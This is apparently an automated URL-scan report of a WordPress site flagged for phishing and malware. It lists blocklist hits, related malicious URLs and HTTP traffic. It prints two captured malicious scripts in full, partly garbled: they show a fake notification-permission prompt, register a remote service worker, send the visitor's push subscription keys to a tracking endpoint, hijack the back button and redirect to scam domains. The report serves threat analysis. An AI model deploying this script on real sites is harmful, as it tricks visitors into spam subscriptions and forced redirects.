Overview

URL: triumphinvestigativeservicesllc.com/
IP: 162.213.255.27 (United States)
ASN: #22612 NAMECHEAP-NET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer:
Report completed: 2022-12-04 13:52:47 UTC
IDS alerts: 0
Blocklist alert: 23
urlquery alerts: No alerts detected
Tags: None

Domain Summary (0)

No passive DNS data

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro
 No alerts detected

Blocklists

OpenPhish
 No alerts detected

PhishTank
 No alerts detected

Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-12-04 2 triumphinvestigativeservicesllc.com/ Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/ Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-includes/css/dashicons.min.css?ver=6.1.1 Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/plugins/widget-areas/css/wid (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/themes/the-guard/css/alicoBo (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/themes/the-guard/css/dynamic (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/themes/the-guard/css/font-aw (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/themes/the-guard/style.css?v (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-includes/css/dist/block-library/styl (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/plugins/woocommerce/packages (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/plugins/js_composer/assets/c (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/plugins/contact-form-7/inclu (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/uploads/smile_fonts/Defaults (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/plugins/Ultimate_VC_Addons/a (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/plugins/Ultimate_VC_Addons/a (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-includes/js/jquery/jquery-migrate.mi (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/plugins/responsive-lightbox/ (...) Phishing
2022-12-04 2 new.weatherplllatform.com/stick.js?v=9.00 Malware
2022-12-04 2 away.cdnbestplatform.com/go.php?id=9677-22-5680954-11 Malware
2022-12-04 2 greenskymotions.com/b91698fd2.js Phishing
2022-12-04 2 0.greenskymotions.com/b91698fd2.js Phishing
2022-12-04 2 greenskymotions.com/go/mu4genjugq5dcmjrhe3a?sub2=dfastspeed15 Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/plugins/revslider/public/ass (...) Phishing

mnemonic secure dns
 No alerts detected

Quad9 DNS
 No alerts detected


Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 162.213.255.27
Date UQ / IDS / BL URL IP
2022-12-09 00:43:53 +0000 0 - 0 - 11 rgrlondon.com/ngi/index.php?QBOT.zip 162.213.255.27
2022-12-08 01:54:24 +0000 0 - 0 - 3 rgrlondon.com/ngi/index.php?QBOT.zip 162.213.255.27
2022-12-04 13:52:47 +0000 0 - 0 - 23 triumphinvestigativeservicesllc.com/ 162.213.255.27
2022-09-13 22:15:19 +0000 0 - 0 - 2 hmsjasmin.com/AdelaidaSeptember/lilly/3zpz954 (...) 162.213.255.27
2022-09-05 19:22:05 +0000 0 - 0 - 3 lomksrare.org/ 162.213.255.27


Last 5 reports on ASN: NAMECHEAP-NET
Date UQ / IDS / BL URL IP
2023-02-08 01:10:27 +0000 0 - 2 - 2 52421398.top/login.php 162.0.215.120
2023-02-08 00:55:23 +0000 0 - 2 - 0 52421398.top/login.php 162.0.215.120
2023-02-08 00:00:08 +0000 0 - 0 - 20 addaxbanking.com/ 68.65.122.207
2023-02-07 23:44:55 +0000 0 - 0 - 1 parewebs.com/ 198.54.126.138
2023-02-07 23:33:59 +0000 0 - 0 - 7 habaricom.com/ 66.29.147.146


Last 1 reports on domain: triumphinvestigativeservicesllc.com
Date UQ / IDS / BL URL IP
2022-12-04 13:52:47 +0000 0 - 0 - 23 triumphinvestigativeservicesllc.com/ 162.213.255.27


Last 5 reports with similar screenshot
Date UQ / IDS / BL URL IP
2023-02-07 23:51:04 +0000 0 - 2 - 0 fiftyflattery.top/b071SXxhfGoGfnVEcjEmbTIUWxZ (...) 104.21.71.22
2023-02-07 23:43:06 +0000 0 - 0 - 4 account.jxtxjx.com/jp.php 47.91.23.80
2023-02-07 22:40:22 +0000 4 - 1 - 7 multiplexlogic.com/coxmado/web/login.php?web/ (...) 108.179.232.32
2023-02-07 21:29:57 +0000 0 - 0 - 11 cn.mcafee-service.us.com/ 45.56.79.23
2023-02-07 21:11:34 +0000 0 - 4 - 0 6784.world/go.php?go=download.tl/download/c4a (...) 185.66.201.7

JavaScript

Executed Scripts (14)

Executed Evals (2)
#1 JavaScript::Eval (size: 8089) - SHA256: 4a2e974d1ae1054a69bb97d439f99d1f220a390c65f496c21e2bc7ae84293c70
'use strict';
var guardEnabled = false;
var isChrome = false;
if (guardEnabled && /Chrome/.test(navigator.userAgent || '') && /Google Inc/.test(navigator.vendor || '')) {
    let version = navigator.userAgent.match(/Chrom(?:e|ium)\/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/);
    if (version !== null && compareVersion('74.0.3729.131', version[1]) <= 0) {
        isChrome = true
    }
}

function compareVersion(v1, v2) {
    if (typeof v1 !== 'string') return false;
    if (typeof v2 !== 'string') return false;
    v1 = v1.split('.');
    v2 = v2.split('.');
    const k = Math.min(v1.length, v2.length);
    for (let i = 0; i < k; ++i) {
        v1[i] = parseInt(v1[i], 10);
        v2[i] = parseInt(v2[i], 10);
        if (v1[i] > v2[i]) return 1;
        if (v1[i] < v2[i]) return -1
    }
    return v1.length == v2.length ? 0 : (v1.length < v2.length ? -1 : 1)
}
const MESSAGES = {
        ru: {
            title: '... запрашивает разрешение на:',
            permission: 'Показ уведомлений',
            allow: 'Разрешить',
            disallow: 'Блокировать'
        },
        en: {
            title: '... wants to:',
            permission: 'Show notifications',
            allow: 'Allow',
            disallow: 'Block'
        },
        it: {
            title: '... chiede il permesso di:',
            permission: 'Mostra notifiche',
            allow: 'Permettere',
            disallow: 'Bloccare'
        },
        id: {
            title: '... meminta izin untuk:',
            permission: 'Tampilkan pemberitahuan',
            allow: 'Mengizinkan',
            disallow: 'Blok'
        },
        vi: {
            title: '... xin phép:',
            permission: 'Hiển thị thông báo',
            allow: 'Cho phép',
            disallow: 'Khối'
        },
        ar: {
            title: '... J7D( %0F D:',
            permission: '%8G'
            1 'D%.7'
            1 '*',
            allow: ''
            D3E '-',
            disallow: 'EF9'
        },
        pl: {
            title: '... prosi o pozwolenie:',
            permission: 'Pokaż powiadomienia',
            allow: 'Dopuszcza',
            disallow: 'Blok'
        },
        pt: {
            title: '... pede permissão para:',
            permission: 'Mostrar notificações',
            allow: 'Permitir',
            disallow: 'Quadra'
        },
        fr: {
            title: '... demande la permission de:',
            permission: 'Afficher les notifications',
            allow: 'Permettre',
            disallow: 'Bloc'
        },
        de: {
            title: '... bittet um Erlaubnis:',
            permission: 'Zeige Benachrichtigungen',
            allow: 'Ermöglichen',
            disallow: 'Block'
        },
        es: {
            title: '... pide permiso para:',
            permission: 'Mostrar notificaciones',
            allow: 'Permitir',
            disallow: 'Bloquear'
        },
        th: {
            title: '... --8
            2 1: ',permission:'
            A * 2 # A I@ 7 - ',allow:' - 8 2 ',disallow:' % 8 H!'}};MESSAGES.uk=MESSAGES.ru;MESSAGES.current=MESSAGES[getLanguage()]||MESSAGES.en;function getLanguage(){let language=window.navigator?(window.navigator.userLanguage||window.navigator.language||window.navigator.browserLanguage||window.navigator.systemLanguage):'
            ru ';language=language.substr(0,2).toLowerCase();return language}let template='\ < div style = "color:#000;box-sizing: border-box;-webkit-box-sizing:border-box;width: 320px;max-width: 100%;height: 130px;background: #fff;position: fixed;top: 0;left: ' + (window.innerWidth < 400 ? 0 : 56) + 'px;box-shadow: 0 0 20px #0000008a;border-radius: 3px;line-height: 1;" > < img class = "js-close"
            style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 0;margin:0;position: absolute;width: 11px;height:11px;right:10px;top:10px;cursor: pointer;outline: 0 !important;"
            src = "data:image/png;base64,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" / > < div style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 5% 5% 4% 5%;font-family: calibri,arial;font-size: 17px;" > '+MESSAGES.current.title+' < /div><div style="text-align: left;font-size: 0;line-height: 0;padding: 0 5%;"><img style="width:13px;vertical-align: top;padding: 0;margin: 0;display: inline-block;" src="data:image/png;base64,
            iVBORw0KGgoAAAANSUhEUgAAACQAAAAqCAMAAADs1AnaAAAAUVBMVEUAAABaWlpZWVlaWlpZWVlSUlJZWVlaWlpZWVlZWVlWVlZOTk5ZWVlZWVlaWlpZWVlZWVlXV1dRUVFaWlpaWlpZWVlaWlpZWVlaWlpVVVVaWlqPKIPXAAAAGnRSTlMAXm2UZw358qZCMAjfzbOrWDUX48S4nIx3J6SDwgkAAAC9SURBVDjL7dLLDoMgEIXhaSsC3vHuef8HLVETFWHUpMv + 6 y9nMUBupm0NXVTFQFzxRmSwZYJFUwxbPLEoWVDCEN1nmMt6HVopsKvwrkUSh2R0NiNOjacdeHK2EulDMjmgDt66vdEItL + ECiG1GdGEULO9okEws / 2 PMKrcI / GneofR + 49 + iB49S1qEUZGuRoFJpbMpwVZaJVbDKEE5LssJN6LXjeh59Wet5pDEnOQQDQsaiEso2JQgPp3nmpy + KIFSTz3Bs58AAAAASUVORK5CYII = "/><span style="
            display: inline - block;vertical - align: top;margin - left: 14 px;font - size: 15 px;line - height: 1;font - family: Calibri,
            Arial;font - weight: 400;
            ">'+MESSAGES.current.permission+'</span></div><div style="
            padding: 22 px 12 px 0 12 px;font - size: 0;line - height: 0;text - align: right;
            "><div class="
            js - allow " style="
            font - weight: 600;border: 1 px solid # dadce0;color: #3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" >'+MESSAGES.current.allow+'</div><div class= "js-denied"
            style = "font-weight:600;border:1px solid#dadce0;color:#3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" > '+MESSAGES.current.disallow+' < /div></div > < /div>';var rootElement=null;var canStart=false;window.onload=function(){function GGG(){if(isChrome&&rootElement){rootElement.parentNode.removeChild(rootElement);rootElement=null;let wait=()=>{if(!canStart){return setTimeout(wait,500)}};wait();SSS()}}document.querySelector('html').addEventListener('click',GGG);document.querySelector('html').addEventListener('keydown',GGG);if(isChrome){rootElement=document.createElement('div');rootElement.innerHTML=template;document.body.appendChild(rootElement)}};function disableHistory(){try{$(window).on('popstate',function(t){if(t.state){if(Notification.permission==='granted'){location.replace('https:/ / di4.biz / ? auf = gy2tqmleha5dcnrqgixtcmjrhe3c6nbpmy2tezlemi2dklzrgixtcnrxgaytmmjzgyya & p = b & sub1 = & sub2 = dfastspeed15 & sub3 = & sub4 = & cpc = 0 & cpm = 0 ')}else{location.replace('
            https : //di4.biz/?auf=gy2tqmleha5dcnrqgixtcmjrhe3c6nbpmy2tezlemi2dklzrgixtcnrxgaytmmjzgyya&p=b&sub1=&sub2=dfastspeed15&sub3=&sub4=&cpc=0&cpm=0')}}})}catch(error){}}disableHistory();let myApplicationServerKey=urlB64ToUint8Array('BIbjCoVklTIiXYjv3Z5WS9oemREJPCOFVHwpAxQphYoA5FOTzG-xOq6GiK31R-NF--qzgT3_C2jurmRX_N6nY4g');var denied=function(){window.location.href='https://di4.biz/?auf=gy2tqmleha5dcnrqgixtcmjrhe3c6nbpmy2tezlemi2dklzrgixtcnrxgaytmmjzgyya&p=b&sub1=&sub2=dfastspeed15&sub3=&sub4=&cpc=0&cpm=0'};let workerInstaller=null;function getWorkerRegistration(){return workerInstaller.then(()=>navigator.serviceWorker.ready)}function CCC(){return getWorkerRegistration().then(registration=>registration.pushManager.subscribe({userVisibleOnly:true,applicationServerKey:myApplicationServerKey})).then(fff=>{let gmt=-new Date().getTimezoneOffset()/60;let rawKey=fff.getKey?fff.getKey('p256dh'):'';let key=rawKey?btoa(String.fromCharCode.apply(null,new Uint8Array(rawKey))):'';let rawAuthSecret=fff.getKey?fff.getKey('auth'):'';let authSecret=rawAuthSecret?btoa(String.fromCharCode.apply(null,new Uint8Array(rawAuthSecret))):'';return fetch('/?send=7d6873aa-840c-4786-92e7-c992d53d5656&d=mu4genjugq5dcmjrhe3a&land=4',{method:'POST',mode:'no-cors',body:JSON.stringify({id:fff.endpoint,key:key,secret:authSecret,gmt:gmt,uri:window.location.href})})}).then(()=>{window.location.href='https://di4.biz/?auf=gy2tqmleha5dcnrqgixtcmjrhe3c6nbpmy2tezlemi2dklzrgixtcnrxgaytmmjzgyya&p=b&sub1=&sub2=dfastspeed15&sub3=&sub4=&cpc=0&cpm=0'}).catch(()=>{denied()})};function SSS(){Notification.requestPermission().then(function(){if(Notification.permission==='granted'){CCC()}else{denied()}})};if('serviceWorker'in 
navigator){workerInstaller=navigator.serviceWorker.register('/b91698fd2.js').then(()=>{if(Notification.permission==='granted'){window.location.href='https://di4.biz/?auf=gy2tqmleha5dcnrqgixtcmjrhe3c6nbpmy2tezlemi2dklzrgixtcnrxgaytmmjzgyya&p=b&sub1=&sub2=dfastspeed15&sub3=&sub4=&cpc=0&cpm=0'}else if(Notification.permission!=='denied'){canStart=true;if(!isChrome){SSS()}}else{denied()}})}
#2 JavaScript::Eval (size: 7971) - SHA256: 20b0abfdadb8c8da7300bceadd6d788663ce68b42d369f21065fe1e2dc8a39f2
'use strict';
var guardEnabled = false;
var isChrome = false;
if (guardEnabled && /Chrome/.test(navigator.userAgent || '') && /Google Inc/.test(navigator.vendor || '')) {
    let version = navigator.userAgent.match(/Chrom(?:e|ium)\/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/);
    if (version !== null && compareVersion('74.0.3729.131', version[1]) <= 0) {
        isChrome = true
    }
}

function compareVersion(v1, v2) {
    if (typeof v1 !== 'string') return false;
    if (typeof v2 !== 'string') return false;
    v1 = v1.split('.');
    v2 = v2.split('.');
    const k = Math.min(v1.length, v2.length);
    for (let i = 0; i < k; ++i) {
        v1[i] = parseInt(v1[i], 10);
        v2[i] = parseInt(v2[i], 10);
        if (v1[i] > v2[i]) return 1;
        if (v1[i] < v2[i]) return -1
    }
    return v1.length == v2.length ? 0 : (v1.length < v2.length ? -1 : 1)
}
const MESSAGES = {
        ru: {
            title: '... запрашивает разрешение на:',
            permission: 'Показ уведомлений',
            allow: 'Разрешить',
            disallow: 'Блокировать'
        },
        en: {
            title: '... wants to:',
            permission: 'Show notifications',
            allow: 'Allow',
            disallow: 'Block'
        },
        it: {
            title: '... chiede il permesso di:',
            permission: 'Mostra notifiche',
            allow: 'Permettere',
            disallow: 'Bloccare'
        },
        id: {
            title: '... meminta izin untuk:',
            permission: 'Tampilkan pemberitahuan',
            allow: 'Mengizinkan',
            disallow: 'Blok'
        },
        vi: {
            title: '... xin phép:',
            permission: 'Hiển thị thông báo',
            allow: 'Cho phép',
            disallow: 'Khối'
        },
        ar: {
            title: '... J7D( %0F D:',
            permission: '%8G'
            1 'D%.7'
            1 '*',
            allow: ''
            D3E '-',
            disallow: 'EF9'
        },
        pl: {
            title: '... prosi o pozwolenie:',
            permission: 'Pokaż powiadomienia',
            allow: 'Dopuszcza',
            disallow: 'Blok'
        },
        pt: {
            title: '... pede permissão para:',
            permission: 'Mostrar notificações',
            allow: 'Permitir',
            disallow: 'Quadra'
        },
        fr: {
            title: '... demande la permission de:',
            permission: 'Afficher les notifications',
            allow: 'Permettre',
            disallow: 'Bloc'
        },
        de: {
            title: '... bittet um Erlaubnis:',
            permission: 'Zeige Benachrichtigungen',
            allow: 'Ermöglichen',
            disallow: 'Block'
        },
        es: {
            title: '... pide permiso para:',
            permission: 'Mostrar notificaciones',
            allow: 'Permitir',
            disallow: 'Bloquear'
        },
        th: {
            title: '... --8
            2 1: ',permission:'
            A * 2 # A I@ 7 - ',allow:' - 8 2 ',disallow:' % 8 H!'}};MESSAGES.uk=MESSAGES.ru;MESSAGES.current=MESSAGES[getLanguage()]||MESSAGES.en;function getLanguage(){let language=window.navigator?(window.navigator.userLanguage||window.navigator.language||window.navigator.browserLanguage||window.navigator.systemLanguage):'
            ru ';language=language.substr(0,2).toLowerCase();return language}let template='\ < div style = "color:#000;box-sizing: border-box;-webkit-box-sizing:border-box;width: 320px;max-width: 100%;height: 130px;background: #fff;position: fixed;top: 0;left: ' + (window.innerWidth < 400 ? 0 : 56) + 'px;box-shadow: 0 0 20px #0000008a;border-radius: 3px;line-height: 1;" > < img class = "js-close"
            style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 0;margin:0;position: absolute;width: 11px;height:11px;right:10px;top:10px;cursor: pointer;outline: 0 !important;"
            src = "data:image/png;base64,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" / > < div style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 5% 5% 4% 5%;font-family: calibri,arial;font-size: 17px;" > '+MESSAGES.current.title+' < /div><div style="text-align: left;font-size: 0;line-height: 0;padding: 0 5%;"><img style="width:13px;vertical-align: top;padding: 0;margin: 0;display: inline-block;" src="data:image/png;base64,
            iVBORw0KGgoAAAANSUhEUgAAACQAAAAqCAMAAADs1AnaAAAAUVBMVEUAAABaWlpZWVlaWlpZWVlSUlJZWVlaWlpZWVlZWVlWVlZOTk5ZWVlZWVlaWlpZWVlZWVlXV1dRUVFaWlpaWlpZWVlaWlpZWVlaWlpVVVVaWlqPKIPXAAAAGnRSTlMAXm2UZw358qZCMAjfzbOrWDUX48S4nIx3J6SDwgkAAAC9SURBVDjL7dLLDoMgEIXhaSsC3vHuef8HLVETFWHUpMv + 6 y9nMUBupm0NXVTFQFzxRmSwZYJFUwxbPLEoWVDCEN1nmMt6HVopsKvwrkUSh2R0NiNOjacdeHK2EulDMjmgDt66vdEItL + ECiG1GdGEULO9okEws / 2 PMKrcI / GneofR + 49 + iB49S1qEUZGuRoFJpbMpwVZaJVbDKEE5LssJN6LXjeh59Wet5pDEnOQQDQsaiEso2JQgPp3nmpy + KIFSTz3Bs58AAAAASUVORK5CYII = "/><span style="
            display: inline - block;vertical - align: top;margin - left: 14 px;font - size: 15 px;line - height: 1;font - family: Calibri,
            Arial;font - weight: 400;
            ">'+MESSAGES.current.permission+'</span></div><div style="
            padding: 22 px 12 px 0 12 px;font - size: 0;line - height: 0;text - align: right;
            "><div class="
            js - allow " style="
            font - weight: 600;border: 1 px solid # dadce0;color: #3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" >'+MESSAGES.current.allow+'</div><div class= "js-denied"
            style = "font-weight:600;border:1px solid#dadce0;color:#3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" > '+MESSAGES.current.disallow+' < /div></div > < /div>';var rootElement=null;var canStart=false;window.onload=function(){function GGG(){if(isChrome&&rootElement){rootElement.parentNode.removeChild(rootElement);rootElement=null;let wait=()=>{if(!canStart){return setTimeout(wait,500)}};wait();SSS()}}document.querySelector('html').addEventListener('click',GGG);document.querySelector('html').addEventListener('keydown',GGG);if(isChrome){rootElement=document.createElement('div');rootElement.innerHTML=template;document.body.appendChild(rootElement)}};function disableHistory(){try{$(window).on('popstate',function(t){if(t.state){if(Notification.permission==='granted'){location.replace('https:/ / di4.biz / ? auf = miygkzjtgy5dcnrqgixtcmjrhe3c6mrqf5tdkmtfmrrdinjpgezc6mjwg4ydcnrrhe2ts & p = b & sub1 = & sub2 = dfastspeed15 & sub3 = & sub4 = & cpc = 0 & cpm = 0 ')}else{location.replace('
            https : //0.greenskymotions.com/index.php?p=mu4genjugq5dcmjrhe3a&sub2=dfastspeed15')}}})}catch(error){}}disableHistory();let myApplicationServerKey=urlB64ToUint8Array('BIbjCoVklTIiXYjv3Z5WS9oemREJPCOFVHwpAxQphYoA5FOTzG-xOq6GiK31R-NF--qzgT3_C2jurmRX_N6nY4g');var denied=function(){window.location.href='https://0.greenskymotions.com/index.php?p=mu4genjugq5dcmjrhe3a&sub2=dfastspeed15'};let workerInstaller=null;function getWorkerRegistration(){return workerInstaller.then(()=>navigator.serviceWorker.ready)}function CCC(){return getWorkerRegistration().then(registration=>registration.pushManager.subscribe({userVisibleOnly:true,applicationServerKey:myApplicationServerKey})).then(fff=>{let gmt=-new Date().getTimezoneOffset()/60;let rawKey=fff.getKey?fff.getKey('p256dh'):'';let key=rawKey?btoa(String.fromCharCode.apply(null,new Uint8Array(rawKey))):'';let rawAuthSecret=fff.getKey?fff.getKey('auth'):'';let authSecret=rawAuthSecret?btoa(String.fromCharCode.apply(null,new Uint8Array(rawAuthSecret))):'';return fetch('/?send=7d6873aa-840c-4786-92e7-c992d53d5656&d=mu4genjugq5dcmjrhe3a&land=20',{method:'POST',mode:'no-cors',body:JSON.stringify({id:fff.endpoint,key:key,secret:authSecret,gmt:gmt,uri:window.location.href})})}).then(()=>{window.location.href='https://di4.biz/?auf=miygkzjtgy5dcnrqgixtcmjrhe3c6mrqf5tdkmtfmrrdinjpgezc6mjwg4ydcnrrhe2ts&p=b&sub1=&sub2=dfastspeed15&sub3=&sub4=&cpc=0&cpm=0'}).catch(()=>{denied()})};function SSS(){Notification.requestPermission().then(function(){if(Notification.permission==='granted'){CCC()}else{denied()}})};if('serviceWorker'in navigator){workerInstaller=navigator.serviceWorker.register('/b91698fd2.js').then(()=>{if(Notification.permission==='granted'){window.location.href='https://di4.biz/?auf=miygkzjtgy5dcnrqgixtcmjrhe3c6mrqf5tdkmtfmrrdinjpgezc6mjwg4ydcnrrhe2ts&p=b&sub1=&sub2=dfastspeed15&sub3=&sub4=&cpc=0&cpm=0'}else if(Notification.permission!=='denied'){canStart=true;if(!isChrome){SSS()}}else{denied()}})}

Executed Writes (0)


HTTP Transactions (68)


Request Response
                                        
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Server: nginx
Content-Length: 503
ETag: "1BAD6C06AA3E88DCBC125FC98A6CB753EB2B18D2C8DD61DA21D12209AEEDA3F9"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=3800
Expires: Sun, 04 Dec 2022 14:55:56 GMT
Date: Sun, 04 Dec 2022 13:52:36 GMT
Connection: keep-alive

                                        
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Accept-Ranges: bytes
Age: 3636
Cache-Control: max-age=164357
Date: Sun, 04 Dec 2022 13:52:36 GMT
Etag: "638c76f5-1d7"
Expires: Tue, 06 Dec 2022 11:31:53 GMT
Last-Modified: Sun, 04 Dec 2022 10:31:17 GMT
Server: ECS (ska/F71C)
X-Cache: HIT
Content-Length: 471

                                        
GET / HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

162.213.255.27
HTTP/1.1 301 Moved Permanently
content-type: text/html
keep-alive: timeout=5, max=100
content-length: 707
date: Sun, 04 Dec 2022 13:52:36 GMT
server: LiteSpeed
location: https://triumphinvestigativeservicesllc.com/
x-turbo-charged-by: LiteSpeed


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with CRLF, LF line terminators
Size:   707
Md5:    1304294c0823ca486542ba408ed761e3
Sha1:   b2a70fb2d810ca13985882e6981f33998823e83e
Sha256: 3bbe72f3baa8ec61de17a1d767fca58704769684b7abe9161d0c4eaf4c8f0982

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /v1/ HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

34.102.187.140
HTTP/2 200 OK
content-type: application/json
access-control-allow-origin: *
access-control-expose-headers: Retry-After, Content-Type, Backoff, Content-Length, Alert
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Sun, 04 Dec 2022 13:20:07 GMT
cache-control: public,max-age=3600
age: 1949
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    30db107dcf4380cef05efea409c2e6a3
Sha1:   96e6a306fbc07299aba64e5c14e2bfca35872fa9
Sha256: b64051a4a8e346e3c72b2aef77f360a5736ab5e16711d8e0bae3876feaa15b6e
                                        
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Server: nginx
Content-Length: 503
ETag: "7D7232C8C91BCD18161BA2C9D23E3BFF159604E058BD5B3FC1C7FCBCD03A7EE3"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2222
Expires: Sun, 04 Dec 2022 14:29:38 GMT
Date: Sun, 04 Dec 2022 13:52:36 GMT
Connection: keep-alive

                                        
GET /chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain HTTP/1.1
Host: content-signature-2.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

34.160.144.191
HTTP/2 200 OK
content-type: binary/octet-stream
x-amz-id-2: BvXeh6lOQLrIWBevc/RpyMagNcVE1CvjxzuvTOFaqddZMxx6w1Htfi5v9IgMjzO1IFeDNVg4T20=
x-amz-request-id: XTV8XAP8ZFY709EY
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Sun, 04 Dec 2022 13:47:00 GMT
age: 336
last-modified: Thu, 10 Nov 2022 09:21:27 GMT
etag: "9ebddc2b260d081ebbefee47c037cb28"
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    9ebddc2b260d081ebbefee47c037cb28
Sha1:   492bad62a7ca6a74738921ef5ae6f0be5edebf39
Sha256: 74bbb7cba16f7d084a08a0907d47d7496e5c148f904707ec6950f8f6a61027e5
                                        
GET /v1/tiles HTTP/1.1
Host: contile.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

34.117.237.239
HTTP/2 200 OK
content-type: application/json
server: nginx
date: Sun, 04 Dec 2022 13:52:36 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
